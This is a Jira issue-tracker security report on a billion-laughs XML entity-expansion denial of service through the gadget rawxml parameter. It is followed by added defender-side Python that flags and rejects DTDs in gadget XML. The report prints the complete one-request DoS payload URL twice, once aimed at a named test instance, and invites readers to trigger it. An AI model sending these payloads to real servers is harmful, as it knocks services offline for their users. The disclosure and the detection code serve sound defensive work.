Jira Cloud / JRACLOUD-66278

Remote DoS Exploit on JIRA


Details

    Description

      An attacker can perform the billion laughs attack against a default JIRA installation (including OnDemand installations). The attack requires no authentication and exhausts the resources of the victim machine, causing the server to crash or hang. It is possible because arbitrary XML entity declarations can be injected through the rawxml parameter of /plugins/servlet/gadgets/ifr.

      Steps to recreate:

      1. In the following URL, replace host and host/jirapath with the values for the target instance:

      https://host/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE+lolz+%5B%0D%0A+%3C%21ENTITY+lol+%22lol%22%3E%0D%0A+%3C%21ELEMENT+lolz+%28%23PCDATA%29%3E%0D%0A+%3C%21ENTITY+lol1+%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%0D%0A+%3C%21ENTITY+lol2+%22%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%22%3E%0D%0A+%3C%21ENTITY+lol3+%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%0D%0A+%3C%21ENTITY+lol4+%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%0D%0A+%3C%21ENTITY+lol5+%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%0D%0A+%3C%21ENTITY+lol6+%22%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%22%3E%0D%0A+%3C%21ENTITY+lol7+%22%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%22%3E%0D%0A+%3C%21ENTITY+lol8+%22%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%22%3E%0D%0A+%3C%21ENTITY+lol9+%22%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%22%3E%0D%0A%5D%3E%0D%0A%3CModule%3E%0D%0A%3CModulePrefs+title%3D%22Example%22%3E%0D%0A%3C%2FModulePrefs%3E%0D%0A%3CContent%3E%0D%0Adfgd%26lol9%3B%0D%0A%3C%2FContent%3E%0D%0A%3C%2FModule%3E%0D%0A++++&url=https%3A%2F%2Fhost/jirapath%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

      2. Request the above URL; the denial of service is triggered by that single request.

      For example, on a test OnDemand instance, the URL to DoS the instance would be:

      https://0daytest.jira-dev.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE+lolz+%5B%0D%0A+%3C%21ENTITY+lol+%22lol%22%3E%0D%0A+%3C%21ELEMENT+lolz+%28%23PCDATA%29%3E%0D%0A+%3C%21ENTITY+lol1+%22%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%26lol%3B%22%3E%0D%0A+%3C%21ENTITY+lol2+%22%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%26lol1%3B%22%3E%0D%0A+%3C%21ENTITY+lol3+%22%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%26lol2%3B%22%3E%0D%0A+%3C%21ENTITY+lol4+%22%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%26lol3%3B%22%3E%0D%0A+%3C%21ENTITY+lol5+%22%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%26lol4%3B%22%3E%0D%0A+%3C%21ENTITY+lol6+%22%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%26lol5%3B%22%3E%0D%0A+%3C%21ENTITY+lol7+%22%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%26lol6%3B%22%3E%0D%0A+%3C%21ENTITY+lol8+%22%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%26lol7%3B%22%3E%0D%0A+%3C%21ENTITY+lol9+%22%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%26lol8%3B%22%3E%0D%0A%5D%3E%0D%0A%3CModule%3E%0D%0A%3CModulePrefs+title%3D%22Example%22%3E%0D%0A%3C%2FModulePrefs%3E%0D%0A%3CContent%3E%0D%0Adfgd%26lol9%3B%0D%0A%3C%2FContent%3E%0D%0A%3C%2FModule%3E%0D%0A++++&url=https%3A%2F%2F0daytest.jira-dev.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
      

      Note that the above URL is working and the instance is currently up. You can see the exploit in action by visiting that link until the server hangs.

      The original reporter of this security report was Nir Goldshlager (ngoldshlager@salesforce.com).
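      Two defender-side checks for the endpoint described in this report, added here as an example; this is not Atlassian's code and not the reporter's. It (a) inspects a gadget ifr request URL, as it would appear in an access log, and flags a rawxml value that carries a DOCTYPE or ENTITY declaration, which a gadget specification never needs, and (b) parses gadget XML with the standard-library expat parser but aborts at the first DOCTYPE or ENTITY declaration, before any entity is expanded. The host jira.example.test, the function names and the miniature two-level payload are constructed for the example; the gadget url path is the one from the report.

```python
"""Added example, not part of the Jira report or of Atlassian's code.

Two defender-side checks for the /plugins/servlet/gadgets/ifr?rawxml= endpoint:

  flag_rawxml_request(url)  - decodes the rawxml query parameter of a request
                              URL and flags a DOCTYPE / ENTITY declaration.
  parse_gadget_xml(text)    - parses gadget XML with the stdlib expat parser
                              and aborts at the first DOCTYPE or ENTITY
                              declaration, before any entity is expanded.

Host names, function names and the miniature payload are constructed.
"""
from urllib.parse import parse_qs, quote_plus, urlsplit
import xml.parsers.expat


class UntrustedDtdError(ValueError):
    """Inline XML declared a DTD; a gadget specification never needs one."""


def _reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
    # Fires at "<!DOCTYPE name [", before the internal subset is read,
    # so no entity declared inside it is ever expanded.
    raise UntrustedDtdError("DOCTYPE %r is not allowed in gadget XML" % doctype_name)


def _reject_entity(entity_name, is_parameter_entity, value, base,
                   system_id, public_id, notation_name):
    # Defence in depth: rejects entity declarations even if the DOCTYPE
    # handler were ever left unset.
    raise UntrustedDtdError("ENTITY %r is not allowed in gadget XML" % entity_name)


def parse_gadget_xml(xml_text):
    """Return (root element name, ModulePrefs title) or raise UntrustedDtdError."""
    seen = {"root": None, "title": None}

    def start_element(name, attrs):
        if seen["root"] is None:
            seen["root"] = name
        if name == "ModulePrefs":
            seen["title"] = attrs.get("title")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity
    parser.StartElementHandler = start_element
    parser.Parse(xml_text, True)
    return seen["root"], seen["title"]


def is_rejected(xml_text):
    """True if parse_gadget_xml refuses the document because it carries a DTD."""
    try:
        parse_gadget_xml(xml_text)
    except UntrustedDtdError:
        return True
    return False


def flag_rawxml_request(url):
    """Classify one gadget ifr request URL (e.g. taken from an access log)."""
    parts = urlsplit(url)
    if not parts.path.endswith("/plugins/servlet/gadgets/ifr"):
        return "not-gadget-ifr"
    raw = parse_qs(parts.query).get("rawxml")
    if not raw:
        return "no-rawxml"
    lowered = raw[0].lower()  # parse_qs has already percent-decoded the value
    if "<!doctype" in lowered or "<!entity" in lowered:
        return "dtd-in-rawxml"
    return "rawxml-ok"


# Constructed miniature of the report's payload shape: two levels of 10x
# expansion, so &lol2; would expand to only 100 copies of "lol".
MINI_BOMB = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    + '<!DOCTYPE lolz [<!ENTITY lol "lol">'
    + '<!ENTITY lol1 "' + "&lol;" * 10 + '">'
    + '<!ENTITY lol2 "' + "&lol1;" * 10 + '">]>'
    + '<Module><ModulePrefs title="Example"></ModulePrefs>'
    + '<Content>dfgd&lol2;</Content></Module>'
)
# Constructed benign gadget specification with no DTD at all.
BENIGN_GADGET = (
    '<Module><ModulePrefs title="Introduction"></ModulePrefs>'
    '<Content type="html"><![CDATA[<p>Welcome</p>]]></Content></Module>'
)
GADGET_URL = ("https://jira.example.test/rest/gadgets/1.0/g/"
              "com.atlassian.jira.gadgets:introduction-gadget/gadgets/introduction-gadget.xml")
BAD_REQUEST = ("https://jira.example.test/plugins/servlet/gadgets/ifr?rawxml="
               + quote_plus(MINI_BOMB) + "&url=" + quote_plus(GADGET_URL))
OK_REQUEST = ("https://jira.example.test/plugins/servlet/gadgets/ifr?rawxml="
              + quote_plus(BENIGN_GADGET) + "&url=" + quote_plus(GADGET_URL))

if __name__ == "__main__":
    print(flag_rawxml_request(BAD_REQUEST))   # dtd-in-rawxml
    print(flag_rawxml_request(OK_REQUEST))    # rawxml-ok
    print(is_rejected(MINI_BOMB))             # True
    print(parse_gadget_xml(BENIGN_GADGET))    # ('Module', 'Introduction')
```

      The parse-side guard is the one that actually closes the hole: it refuses the document at the DOCTYPE token, so the parser never allocates the expanded text. The request-side flag is cheaper and works on logs after the fact, but a percent-encoded DOCTYPE can be obfuscated in ways a substring check misses, so it is a detection aid rather than a control.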

            People

              ohernandez@atlassian.com Oswaldo Hernandez (Inactive)
              73e00aef4e3f Nir Goldshlager